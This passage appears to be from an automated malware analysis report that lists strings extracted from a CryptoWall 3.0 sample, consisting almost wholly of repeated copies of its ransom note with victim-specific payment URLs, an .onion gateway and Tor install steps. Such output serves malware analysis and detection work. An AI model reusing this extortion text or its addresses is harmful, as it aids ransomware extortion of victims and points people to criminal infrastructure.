<br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html417.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html162.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt272.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html381.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt336.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt380.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html86.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt354.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt164.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt385.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html68.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt226.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt401.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html321.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt111.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt67.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt158.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html76.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt233.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html388.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html409.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html42.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt29.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt324.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt6.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt131.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html224.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
